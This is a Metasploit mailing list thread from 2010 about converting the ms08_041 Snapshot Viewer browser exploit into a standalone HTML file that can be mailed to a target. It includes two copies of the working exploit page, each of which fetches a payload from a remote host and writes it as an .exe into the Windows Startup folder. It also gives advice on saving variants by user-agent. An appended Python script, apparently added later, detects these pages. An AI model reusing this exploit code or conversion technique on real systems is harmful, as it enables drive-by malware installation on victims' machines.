Metasploit mailing list archives

Re: Convert browser type exploit into fileformat type


From: Spring Systems <korund () hotmail com>
Date: Thu, 15 Jul 2010 11:51:25 +0000


Hello,

thanks for tips.

I used wget to get the html file:

wget http://0.0.0.0:8080/Ft27e9lOzyu4ze

the saved file isn't html format (which argument to use and which user-agent?)
It's not full exploit code.

Should I save page right after 'exploit' command (before server starting), or after executing exploit url 
http://192.168.0.1:8080/Ft27e9lOzyu4ze ? HTML code is different.

before:

    <html>
        <head>
            <script>
            try {
                var Tk = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
                Tk.SnapshotPath = "http://192.168.0.1:8080/JQ7QEMXl/payload";;
                Tk.CompressedPath = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\\LWkN.exe";
                Tk.PrintSnapshot();
            } catch( e ) { window.location = 'about:blank' ; }
            </script>
        </head>
        </html>

after:


    <html>
        <head>
            <script>
            try {
                var zBKesSzcrxkcDZdYDKsfIpjWKOrmMahQuoJqEAMceosEQsCZJcGBqWnGVkzVFdLswboqAQU = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
                zBKesSzcrxkcDZdYDKsfIpjWKOrmMahQuoJqEAMceosEQsCZJcGBqWnGVkzVFdLswboqAQU.SnapshotPath = "http://192.168.0.1:8080/Ft27e9lOzyu4ze/payload";;
                zBKesSzcrxkcDZdYDKsfIpjWKOrmMahQuoJqEAMceosEQsCZJcGBqWnGVkzVFdLswboqAQU.CompressedPath = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\\GOvpJExYixLPWreOPU.exe";
                zBKesSzcrxkcDZdYDKsfIpjWKOrmMahQuoJqEAMceosEQsCZJcGBqWnGVkzVFdLswboqAQU.PrintSnapshot();
            } catch( e ) { window.location = 'about:blank' ; }
            </script>
        </head>
        </html>


Best Regards,
Alex




________________________________
From: atul () secfence com
Date: Thu, 15 Jul 2010 15:29:29 +0530
Subject: Re: [framework] Convert browser type exploit into fileformat type
To: korund () hotmail com
CC: framework () spool metasploit com

Hello,

You can convert *almost* all browser based exploits to fileformat ones. As you would have already guessed, you would then be needing to send the html file to exploit, instead of pointing the link.

The general guideline is to start the browser based exploit, and save the page using wget (or anything similar) with appropriate user-agent(s). But of course, this can have some complications as (for ex.) iepeers browser exploit on metasploit launches IE6 and IE7 exploits based on the useragent. So you will have to change user-agent appropriately and save all the variations it has to offer.

Another complication could be the fact that in order to exploit a vuln, loading more than HTML or JS is needed. Take for instance, the Aurora exploit, which required the browser to render an external media (metasploit used gif, I think) for successful exploitation. In order to *convert* that exploit to fileformat, you will have to save that file too.



Hope that helped.

Thanks,
Atul Agarwal
Secfence Technologies
www.secfence.com




On Thu, Jul 15, 2010 at 3:18 PM, Spring Systems wrote:

Hello,

how to convert browser type exploit into "fileformat" type to save it in html or php form?

for example

http://www.metasploit.com/modules/exploit/windows/browser/ms08_041_snapshotviewer

has no fileformat version. How to save exploit with payload in html or php form?

Regards,

Alex





_______________________________________________

https://mail.metasploit.com/mailman/listinfo/framework
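
A defensive check for the two saved pages quoted in this thread, added here as an example (it is not part of the original messages or of Metasploit): because the variable and file names differ on every request, it keys on the ProgID and on the SnapshotPath/CompressedPath properties rather than on any name. The function names, the sample host and the sample file name are constructed for illustration.

```python
import re

# ProgID and property names come from the HTML quoted in the thread.
PROGID = "snpvw.Snapshot Viewer Control.1"
NEW_OBJ = re.compile(
    r"(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*new\s+ActiveXObject\(\s*['\"]"
    + re.escape(PROGID) + r"['\"]\s*\)", re.I)

def _prop(html, var, name):
    """Return the string literal assigned to <var>.<name>, or None."""
    m = re.search(r"(?<![\w$])" + re.escape(var) + r"\s*\.\s*" + name
                  + r"\s*=\s*(['\"])(.*?)\1", html, re.S)
    return m.group(2) if m else None

def scan(html):
    """Return one finding per Snapshot Viewer object created in html."""
    findings = []
    for m in NEW_OBJ.finditer(html):
        var = m.group(1)  # randomised per request, so only used as a handle
        src = _prop(html, var, "SnapshotPath")
        dst = _prop(html, var, "CompressedPath")
        reasons = ["instantiates " + PROGID]
        if src and re.match(r"(?i)https?://", src):
            reasons.append("SnapshotPath is a remote URL")
        if dst and re.search(r"(?i)\\+Startup\\+", dst):
            reasons.append("CompressedPath targets a Startup folder")
        if dst and re.search(r"(?i)\.(exe|scr|bat|cmd|vbs)$", dst):
            reasons.append("CompressedPath has an executable extension")
        findings.append({"var": var, "source": src, "dest": dst,
                         "reasons": reasons})
    return findings

# Constructed samples (placeholder host and file name), shaped like the
# property assignments in the thread's pages.
SAMPLE_SHORT = r'''<script>
var Tk = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
Tk.SnapshotPath = "http://192.0.2.10:8080/EXAMPLE/payload";
Tk.CompressedPath = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\\\a.exe";
</script>'''
SAMPLE_RANDOM = SAMPLE_SHORT.replace("Tk", "zBKesSzcrxkcDZdY")
BENIGN = "<script>var d = new ActiveXObject('Scripting.Dictionary');</script>"

if __name__ == "__main__":
    for page in (SAMPLE_SHORT, SAMPLE_RANDOM, BENIGN):
        for f in scan(page):
            print(f["var"], "->", "; ".join(f["reasons"]))
```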



